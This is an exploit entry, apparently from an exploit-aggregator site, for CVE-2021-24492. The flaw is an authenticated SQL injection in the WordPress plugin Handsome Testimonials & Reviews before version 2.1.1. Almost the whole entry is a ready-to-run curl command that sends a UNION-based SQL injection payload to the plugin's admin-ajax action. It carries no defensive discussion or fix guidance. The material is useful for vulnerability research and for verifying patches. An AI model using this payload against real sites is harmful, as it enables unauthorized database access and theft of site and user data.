Exploit for Handsome Testimonials & Reviews < 2.1.1 - Authenticated (Subscriber+) SQL Injection CVE-2021-24492

## https://sploitus.com/exploit?id=WPEX-ID:42760007-0E59-4D45-8D64-86BC0B8DACEA
curl -i -s -k  -X $'POST' \
    -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: https://example.com' \
    -b $'[any authenticated user]' \
    --data-binary $'action=hndtst_previewShortcodeInstance&hndtst_previewShortcodeInstanceId=-5049 UNION ALL SELECT current_user(),current_user(),CONCAT(0x716b7a6b71,0x5a4a547a475a4e5657516472454b4d4c524764525a69416b7a767961715957584947776954594d4d,0x716a717a71),NULL-- -' \
    $'https://example.com/wp-admin/admin-ajax.php'